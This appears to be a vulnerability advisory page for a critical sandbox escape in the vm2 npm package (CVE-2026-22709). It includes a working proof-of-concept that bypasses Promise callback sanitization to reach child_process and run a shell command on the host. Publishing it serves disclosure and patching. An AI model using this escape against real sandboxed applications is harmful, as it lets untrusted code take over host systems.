CRITICAL 9.8 npm
vm2 has a Sandbox Escape
GHSA-99p7-6v5w-7xg8 · CVE-2026-22709
Published · Modified
Description
In vm2 for version 3.10.0, Promise.prototype.then Promise.prototype.catch callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code.
const { VM } = require("vm2");
const code = `
const error = new Error();
error.name = Symbol();
const f = async () => error.stack;
const promise = f();
promise.catch(e => {
const Error = e.constructor;
const Function = Error.constructor;
const f = new Function(
"process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })"
);
f();
});
`;
new VM().run(code);
In lib/setup-sandbox.js, the callback function of localPromise.prototype.then is sanitized, but globalPromise.prototype.then is not sanitized. The return value of async functions is globalPromise object.
References
- WEB https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-22709
- WEB https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29
- PACKAGE https://github.com/patriksimek/vm2
- WEB https://github.com/patriksimek/vm2/releases/tag/v3.10.2
Ready to move
Start Securing
Free, no credit card | First findings in minutes